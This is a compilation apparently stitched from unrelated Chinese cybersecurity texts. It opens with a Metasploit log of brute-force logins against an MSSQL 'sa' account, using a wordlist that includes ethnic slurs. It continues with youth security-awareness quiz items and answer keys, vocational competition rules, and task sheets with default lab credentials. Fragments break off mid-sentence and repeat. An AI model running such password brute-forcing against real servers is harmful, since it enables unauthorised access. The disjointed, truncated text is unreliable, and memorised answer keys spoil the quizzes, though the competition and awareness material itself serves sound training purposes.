- - MSSQL - Starting authentication scanner.[!] - No active DB -- Credential data will not be saved![-] - - LOGIN FAILED: WORKSTATION\sa:!@#$% (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!@#$%^ (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!@#$%^& (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!@#$%^&* (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!boerbul (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!boerseun (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!gatvol (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!hotnot (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!kak (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:!koedoe (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!likable (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!poes (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!pomp (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!soutpiel (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:.net (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:0 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:000000 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:00000000 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:0007 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:007 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:007007 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:0s (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:0th (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:1 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:10 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:100 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:1000 (Incorrect: )[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed（三）第二阶段任务书假定各位选手是某企业信息安全工程师，负责服务器的维护，其中某服务器可能存在着各种问题和漏洞（见以下漏洞列表）。

江苏省青少网络信息安全知识竞赛题目及答案在当今数字化的时代，网络已经成为青少年生活中不可或缺的一部分。

然而，网络世界中也存在着各种潜在的安全风险。

为了提高青少年对网络信息安全的认识和防范能力，江苏省举办了一场精彩的青少年网络信息安全知识竞赛。

以下是此次竞赛中的部分题目及答案，让我们一起来学习一下。

题目 1：以下哪种行为可能导致个人信息泄露？A 在正规网站填写个人信息B 随意连接公共场合的免费 WiFiC 定期更新电脑系统答案：B解析：公共场合的免费 WiFi 存在较大的安全隐患，不法分子可能会通过这些网络窃取用户的个人信息。

而在正规网站填写个人信息，只要网站有良好的安全防护措施，一般不会导致信息泄露。

定期更新电脑系统有助于修复漏洞，提高安全性。

题目 2：收到陌生号码发来的短信，告知你中了大奖，需要先缴纳手续费才能领取奖金，你应该怎么做？A 按照要求缴纳手续费B 拨打短信中的电话询问详情C 不予理睬，这可能是诈骗答案：C解析：这很可能是一种常见的诈骗手段。

不法分子以中奖为诱饵，骗取受害者的钱财。

一旦缴纳手续费，不仅拿不到所谓的奖金，还会遭受经济损失。

对于此类信息，应坚决不予理睬。

题目 3：在网络上与陌生人交流时，以下哪种做法是不安全的？A 透露自己的家庭住址B 只交流兴趣爱好C 不轻易相信对方的话答案：A解析：向陌生人透露家庭住址等个人隐私信息可能会给自己带来危险，比如遭遇跟踪、骚扰甚至更严重的犯罪行为。

题目 4：以下哪个是设置强密码的正确方式？A 使用生日作为密码B 使用简单的数字组合，如 123456C 包含大小写字母、数字和特殊符号的组合答案：C解析：生日和简单的数字组合很容易被破解，而包含多种字符类型的组合会大大增加密码的安全性。

题目 5：发现自己的电脑中了病毒，应该怎么做？A 立即拔掉电源B 用杀毒软件进行查杀C 不管它，继续使用答案：B解析：拔掉电源可能会导致数据丢失，不管它则会让病毒进一步破坏电脑系统和文件。

中职组⽹络空间安全⼤赛样题⽹络空间安全⼤赛赛项规程⼀、赛项名称赛项名称：⽹络空间安全中职学⽣组⼆、竞赛内容重点考核参赛选⼿⽹络系统安全策略部署、信息保护、⽹络安全运维管理的综合实践能⼒，具体包括：1.参赛选⼿能够在赛项提供的服务器上配置各种协议和服务，实现⽹络系统的运⾏，并根据⽹络业务需求配置各种安全策略，以满⾜应⽤需求。

2.参赛选⼿能够根据⼤赛提供的赛项要求，实施⽹络空间安全防护操作。

3.参赛选⼿能够根据⽹络实际运⾏中⾯临的安全威胁，确定安全策略并部署实施，防范并制⽌⽹络恶意⼊侵和攻击⾏为。

4. 参赛选⼿通过分组混合对抗的形式，能够实时防护⾃⼰服务器，抵御外界的攻击，同时能够对⽬标进⾏渗透和攻击。

5.竞赛总时长为3个⼩时，各竞赛阶段安排如下：序号内容模块具体内容说明第⼀阶段单兵模式系统渗透测试密码学和VPN密码学、IPSec VPN、IKE：PreSharedKey（预共享密钥认证）、IKE：PKI（公钥架构认证）、SSL VPN等。

操作系统渗透测试及加固Windows操作系统渗透测试及加固、Linux操作系统渗透测试及加固等。

Web应⽤渗透测试及加固SQL Injection（SQL注⼊）漏洞渗透测试及加固、Command Injection（命令注⼊）漏洞渗透测试及加固、File Upload（⽂件上传）漏洞渗透测试及加固、DirectoryTraversing（⽬录穿越）漏洞渗透测试及加固、XSS（Cross Site Script）漏洞渗透测试及加固、CSRF（Cross Site RequestForgeries）漏洞渗透测试及加固、SessionHijacking（会话劫持）漏洞渗透测试及加固⽹络安全数据分析能够利⽤⽇志收集和分析⼯具对⽹络流量收集监控，维护⽹络安全。

常⽤渗透扫描⼯具使⽤与脚本语⾔应⽤能够利⽤如Nmap、Nessus、metasploit等常⽤渗透扫描⼯具进⾏信息收集及系统渗透；熟悉shell，Python等脚本语⾔的应⽤。

江苏省青少网络信息安全知识竞赛题目及答案网络已经成为我们生活中不可或缺的一部分，对于青少年来说更是如此。

但在享受网络带来便利的同时，了解网络信息安全知识至关重要。

以下是一些江苏省青少年网络信息安全知识竞赛的题目及答案，希望能帮助大家增强网络安全意识。

题目 1：以下哪种行为可能会导致个人信息泄露？A 在公共场合连接免费 WiFi 进行购物B 定期更新电脑操作系统和软件C 对收到的陌生邮件中的链接置之不理D 设置复杂的密码并定期更换答案：A解析：在公共场合连接免费 WiFi 存在较大风险，不法分子可能会通过这种网络窃取用户的个人信息，如账号密码、支付信息等。

而选项 B 定期更新操作系统和软件有助于修复漏洞，增强安全性；选项 C 对陌生邮件链接置之不理能避免陷入钓鱼网站等陷阱；选项 D 设置复杂密码并定期更换能提高账户安全性，降低被破解的风险。

题目 2：在网上注册账号时，以下哪种做法是不正确的？A 尽量使用真实姓名和生日作为用户名B 不同的账号设置不同的密码C 密码包含数字、字母和特殊符号D 填写个人信息时，只填写必要的部分答案：A解析：使用真实姓名和生日作为用户名容易被他人猜测或获取，增加账号被破解的风险。

选项 B 不同账号设置不同密码能避免一个账号密码泄露导致其他账号受到威胁；选项 C 包含多种字符的复杂密码更难被破解；选项 D 只填写必要信息可减少个人信息暴露的范围。

题目 3：收到陌生号码发来的短信，称可以提供高额贷款，需要先缴纳手续费，你应该怎么做？A 按照要求缴纳手续费，获取贷款B 拨打短信中的联系电话咨询详情C 不予理睬，这可能是诈骗D 向朋友请教是否可信答案：C解析：这种情况很可能是诈骗，正规的贷款机构不会在放款前要求缴纳手续费。

按照要求操作可能会导致钱财损失。

拨打联系电话可能会陷入进一步的诈骗陷阱，向朋友请教也不一定能得到准确的判断，所以最好的做法是不予理睬。

题目 4：以下哪种是防范网络钓鱼的正确方法？A 点击来自陌生人的邮件中的链接B 随意在网上填写个人敏感信息C 仔细核对网址，确认其真实性D 相信网上的低价促销信息答案：C解析：仔细核对网址，确认其真实性可以有效防范网络钓鱼。

2019年全国职业院校技能大赛中职组“网络空间安全”赛卷八一、竞赛阶段二、拓扑图PC机环境：物理机：Windows7；虚拟机1：Ubuntu Linux 32bit（用户名：root；密码：123456）,安装工具集：Backtrack5,安装开发环境：Python3；虚拟机2：Kali1.0（用户名：root；密码：toor）；虚拟机3：Kali2.0（用户名：root；密码：toor）；虚拟机4：WindowsXP（用户名：administrator；密码：123456）。

三、竞赛任务书（一）第一阶段任务书（700分）任务1. Wireshark数据包分析（100分）任务环境说明：✓服务器场景：PYsystem20191✓服务器场景操作系统：Windows（版本不详）1.使用Wireshark查看并分析PYsystem20191桌面下的capture4.pcap 数据包文件，找出黑客获取到的可成功登录目标服务器FTP的账号密码，并将黑客获取到的账号密码作为Flag值（用户名与密码之间以英文逗号分隔，例如：root,toor）提交；（9分）2.继续分析数据包capture4.pcap，找出黑客使用获取到的账号密码登录FTP的时间，并将黑客登录FTP的时间作为Flag值（例如：14:22:08）提交；（13分）3.继续分析数据包capture4.pcap，找出黑客连接FTP服务器时获取到的FTP服务版本号，并将获取到的FTP服务版本号作为Flag值提交；（15分）4.继续分析数据包capture4.pcap，找出黑客成功登录FTP服务器后执行的第一条命令，并将执行的命令作为Flag值提交;（11分）5.继续分析数据包capture4.pcap，找出黑客成功登录FTP服务器后下载的关键文件，并将下载的文件名称作为Flag值提交；（13分）6.继续分析数据包capture4.pcap，找出黑客暴力破解目标服务器Telnet服务并成功获取到的用户名与密码，并将获取到的用户名与密码作为Flag值（用户名与密码之间以英文逗号分隔，例如：root,toor）提交；（9分）7.继续分析数据包capture4.pcap，找出黑客在服务器网站根目录下添加的文件，并将该文件的文件名称作为Flag值提交；（13分）8.继续分析数据包capture4.pcap，找出黑客在服务器系统中添加的用户，并将添加的用户名与密码作为Flag值（用户名与密码之间以英文逗号分隔，例如：root,toor）提交。

JSZ202034-2020年江苏省职业院校技能⼤赛中职组⽹络空间安全赛项规程2020年江苏省职业院校技能⼤赛中职赛项规程⼀、赛项名称赛项编号：JSZ202034赛项名称：⽹络空间安全赛项组别：中职组、教师组赛项归属专业⼤类：信息技术类⼆、竞赛⽬的⽹络空间安全已经上升到国家安全的战略⾼度，得到社会各界的⼴泛重视，信息安全产业发展进⼊快车道。

通过本竞赛，可检验参赛学⽣对⽹络、服务器系统等⽹络空间中各个信息系统的安全防护能⼒，以及分析、处理现场问题的能⼒，培养更多学⽣掌握⽹络安全知识与技能，发展成为国家信息安全领域的技术技能⼈才。

通过本竞赛，可以引导中等职业学校教师熟悉⽹络安全技术发展趋势和产业应⽤⽅向，促进⽹络信息安全专业建设与教学改⾰。

本赛项紧密结合新⼀代信息产业发展对⽹络安全应⽤型⼈才的需求，促进校企合作、产教融合，增强中职学校教师培养学⽣的新技术学习能⼒和就业竞争⼒，助⼒新⼀代信息技术产业快速发展，实现“以赛促学、以赛促教、以赛促改、以赛促创”。

三、竞赛内容竞赛内容注重考核⽹络安全设计、安全策略配置、系统渗透测试以及信息安全攻防等⽅⾯，还原实际⼯作场景，基于⼯作过程的竞赛任务书设计，考察选⼿⽹络空间安全的综合技能和素质。

竞赛内容分为理论知识、技能操作两个部分。

（⼀）理论知识竞赛内容理论知识竞赛采取计算机答题⽅式进⾏，题型为单选题、多选题和判断题，内容为技能竞赛相关的理论知识（含密码学、VPN、操作系统加固、WEB渗透、⽹络数据安全、⽹络设备安全控制等），时间1⼩时。

（⼆）技能操作竞赛内容技能操作竞赛以现场实际操作的⽅式进⾏。

选⼿在规定时间内，根据竞赛时发给的⼯作任务书完成相应任务，时间3⼩时。

竞赛技能点及⽐例见下表。

序号技能点内容描述分值⽐例1 安全防护技术HTTP防护、会话跟踪、数据窃取防护、漏洞扫描、防篡改等技术。

20%2 服务器渗透技术针对未设置防护的数据库和服务器进⾏扫描、密码猜测等渗透测试。

2021年全国职业院校技能大赛（中职组）网络安全竞赛试题（4）（总分100分）赛题说明一、竞赛项目简介“网络安全”竞赛共分A. 基础设施设置与安全加固；B. 网络安全事件响应、数字取证调查和应用安全；C. CTF夺旗-攻击；D. CTF 夺旗-防御等四个模块。

根据比赛实际情况，竞赛赛场实际使用赛题参数、表述及环境可能有适当修改，具体情况以实际比赛发放赛题为准。

竞赛时间安排和分值权重见表1。

表1 竞赛时间安排与分值权重二、竞赛注意事项1.比赛期间禁止携带和使用移动存储设备、计算器、通信工具及参考资料。

2.请根据大赛所提供的比赛环境，检查所列的硬件设备、软件清单、材料清单是否齐全，计算机设备是否能正常使用。

3.在进行任何操作之前，请阅读每个部分的所有任务。

各任务之间可能存在一定关联。

4.操作过程中需要及时按照答题要求保存相关结果。

比赛结束后，所有设备保持运行状态，评判以最后提交的成果为最终依据。

5.比赛完成后，比赛设备、软件和赛题请保留在座位上，禁止将比赛所用的所有物品（包括试卷等）带离赛场。

6.禁止在提交资料上填写与竞赛无关的标记，如违反规定，可视为0分。

竞赛内容模块A 基础设施设置与安全加固（本模块20分）一、项目和任务描述：假定你是某企业的网络安全工程师，对于企业的服务器系统，根据任务要求确保各服务正常运行，并通过综合运用登录和密码策略、数据库安全策略、流量完整性保护策略、事件监控策略、防火墙策略等多种安全策略来提升服务器系统的网络安全防御能力。

本模块要求对具体任务的操作截图并加以相应的文字说明,以word文档的形式书写,以PDF格式保存,以赛位号作为文件名.二、服务器环境说明Windows 用户名：administrator，密码：123456Linux 用户名：root，密码：123456三、具体任务（每个任务得分以电子答题卡为准）A-1任务一登录安全加固（Windows, Linux）请对服务器Windows、Linux按要求进行相应的设置，提高服务器的安全性。

2018年江苏省青少年网络信息安全知识竞赛题目及答案一、单选题（每题3分）1.( )是按备份周期对整个系统所有的文件(数据)进行备份,是克服系统数据不安全的最简单的方法。

A. 按需备份策略B. 完整备份策略C. 差分备份策略D. 增量备份策略。

参考答案：B2.对于新购买的电脑,不建议的行为是( ) A. 设置开机密码B. 安装QQ软件 C. 让电脑公司重装XP系统 D. 启用Windows Update。

参考答案：C3.下列操作中不能防范个人口令被字典暴力攻击的是( ) A. 确保口令不在终端上再现 B. 避免使用过短的口令 C. 使用动态口令卡产生的口令 D. 严格限定从一个给定的终端进行非法认证的次数。

参考答案：A4.用户收到了一封可疑的电子邮件,要求用户提供银行账户及密码,这是属于何种攻击手段？( ) A. 缓存溢出攻击B. 钓鱼攻击C. 暗门攻击D. DDOS攻击。

参考答案：B5.Windows保存用户账户信息的文件是( ) A. SAM B. UserDB C. Passwd D. 注册表。

参考答案：A6.以下选项中计算机网络安全属性不包括哪一项( ) A. 机密性B. 完整性C. 可用性D. 稳定性。

参考答案：D7.单钥密码体制的保密性主要取决于( ) A. 密钥的安全性B. 密文的安全性 C. 加密算法的安全性 D. 解密算法的安全性。

参考答案：A8.橘皮书定义了4个安全层次,从D 层(最低保护层)到A 层(验证性保护层),属于 D 级的系统是不安全的,以下操作系统中不属于 C 级的是( ) A. UNIX 系统B. LINUX 系统C. WINDOWS 2000 D. WINDOWS 98。

参考答案：D9.以下属于防范假冒热点攻击的措施是( ) A. 尽量使用免费WIFI B. 不要打开WIFI 的自动连接功能C. 在免费WIFI 上购物D. 任何时候不使用WIFI 联网。

参考答案：B10.IP地址不用于什么设备( ) A. 网络设备B. 网络上的服务器C. 移动硬盘D. 上网的计算机。

江苏网安竞赛活动高中组8◇作答时间为25分钟本套试题分为三个部分，1-20题为单选题（每题3分），21-28题为多选题（每题5分），29-30为简答题（不占分）1.下面不属于网络安全服务的是( )• A. 访问控制技术• B. 数据加密技术• C. 身份认证技术• D. 数据统一性技术我的答案：参考答案：D收起解析难度系数：考点：参考解析：略2.目前防病毒软件能实现的功能是()• A. 检查计算机是否染有病毒,消除已感染的任何病毒• B. 杜绝任何病毒对计算机的侵害• C. 查出已知的计算机病毒,清除其中一部分病毒• D. 对查到的感染计算机病毒的文件均作删除处理我的答案：参考答案：C收起解析难度系数：考点：参考解析：略3.关于暴力破解密码,以下表述正确的是( )• A. 就是使用计算机不断尝试密码的所有排列组合,直到找出正确的密码• B. 指通过木马等侵入用户系统,然后盗取用户密码• C. 指入侵者通过电子邮件哄骗等方法,使得被攻击者提供密码• D. 通过暴力威胁,让用户主动透露密码我的答案：参考答案：A收起解析难度系数：考点：参考解析：略4.在使用苹果公司产品时,为了想获得root权限,很多用户采取违反法律的手段,这个手段通常被称为( )• A. 借壳• B. 开源• C. 免费• D. 越狱我的答案：参考答案：D收起解析难度系数：考点：参考解析：略5.下列叙述不属于完全备份机制特点描述的是()• A. 每次备份的数据量较大• B. 每次备份所需的时间也较长• C. 不能进行得太频繁• D. 需要存储空间小我的答案：参考答案：D收起解析难度系数：考点：参考解析：略6.要实现有效的计算机和网络病毒防治,()应承担责任。

• A. 高级管理层• B. 部门经理• C. 系统管理员• D. 所有计算机用户我的答案：参考答案：D收起解析难度系数：考点：略7.下列哪个软件可以用来实现用户数据的恢复( )• A. IE• B. notepad• C. W32Dasm• D. EasyRecvery我的答案：参考答案：D收起解析难度系数：考点：参考解析：略8.以下属于防范假冒热点攻击的措施是( )• A. 尽量使用免费WI-FI• B. 不要打开WI-FI的自动连接功能• C. 在免费WI-FI上购物• D. 任何时候不使用WI-FI联网我的答案：参考答案：B收起解析难度系数：考点：参考解析：略9.你的qq好友给你在qq留言,说他最近通过网络兼职赚了不少钱,让你也去一个网站注册申请兼职。

网络安全单选题（25题）1.手机微信有“摇一摇”和“查看附近的人”的功能，此功能带来方便的同时，也可能造成有些人损失钱财，其原因是（）A.软件有漏洞B.软件被植入木马C.缺少信息安全和防范意识D.软件功能不完善答案：C2.病毒“PETER—2”在每年2月27日会提三个问题，答错后会对硬盘数据加密。

这体现了病毒的（）A.传染性B.隐蔽性C.连续性D.可触发性答案：D3.保障信息安全的有效做法是（）A.可以使用个人的出生年月作为常用密码B.密码的设置要安全,并且定期更换C.在任何场合使用相同的密码D.不用防范木马答案：B4.下列有关计算机病毒防治的做法错误的是（）A.安装杀毒软件,并经常升级B.不轻易使用不明来历的软盘和光盘，必须使用时先检测其中的文件是否感染病毒C.不随意打开不明来历的电子邮件D若不小心感染了病毒,将硬盘进行格式化答案：D5.某用户收到邮件，有4个附件，他应谨慎打开的是（）A照片处理.exeB.模拟试题.txtC.千里之外.mp3D.毕业照. bmp答案：A6.在网吧或者公共场所上网，登录自己的邮箱查看邮件，安全的行为是（）A.选择让电脑记住登录账户和密码B.从邮箱下载文件查看后,不必从电脑中彻底删除C.使用完邮箱后,选择从邮箱安全退出D.查看邮件中途有事离开,不需要从邮箱退出答案：C7.下列关于防火墙的叙述，正确的是（）A.防火墙只能检查外部网络访向内网的合法性B只要安装了防火墙，则系统就不会受到黑客的攻击C.防火墙虽然能够提高网络的安全性,但不能保证网络绝对安全D.防火墙的主要功能是查杀病毒答案：C8.许多黑客攻击都是利用软件实现中的缓冲区溢出的漏洞，对于这一威胁，最可靠的解决方案是什么？（）A.安装防火墙B.安装入侵检测系统C.给系统安装最新的补丁D.安装防病毒软件答案：C9.下列选项中，破坏了数据完整性的是（）A.假冒他人地址发送数据B.不承认做过信息的递交行为C.数据在传输中途被窃听D.数据在传输中途被篡改答案：D10.防御网络监听最常用的方法是（）A.采用物理传输(非网络)B.信息加密C.使用无线网D.使用专线传输答案：B11.小明转发了小刚的一条微博并得到很多人的评论，如果小刚的微博涉嫌侵犯他人权利，,则有侵权行为的（）A.只有小刚B.有小明和小刚C.有小明、小刚及这条微博的评论者D.有小明、小刚及这条微博的评论者和浏览者答案：B12.网络信息安全保护的对象是网络系统中硬件、软件及其（）A.用户B管理制度C数据D.设备答案：C13.用户收到了一封可疑的电子邮件，要求用户提供银行账户及密码，这是属于何种攻击手段？（）A.缓存溢出攻击B.钓鱼攻击C.暗门攻击D.DDOS攻击答案：B14.在以下认证方式中，最常用的认证方式是（）A.基于账户名/口令认证B.基于摘要算法认证C.基于PKI认证D.基于数据库认证答案：A15.为了预防地震等不可预测的灾难对数据安全的影响，一般会（）A.在保险柜里存一份B.进行异地备份C.安装灾害预测系统D.进行本地备份答案：B16.一般而言,Internet防火墙建立在一个网络的（）A内部网络与外部网络的交叉点B.每个子网的内部C.部分内部网络与外部网络的结合处D.内部子网之间传送信息的中枢答案：A17.使网络服务器中充斥着大量要求回复的信息，消耗带宽，导致网络或系统停止正常服务，这属于什么攻击类型？A.拒绝服务B.文件共享C.BIND漏洞D.远程过程调用答案：A18.校园网防火墙的主要作用是（）A.杜绝病毒感染校园网内的计算机B.防止外网用户攻击校园网内部计算机C.起到防止火灾的作用D.保证校园网的绝对安全答案：B19.棱镜门事件的主角斯诺登说过：“一旦连上网络，无论采用什么样的保护措施，你都不可能安全。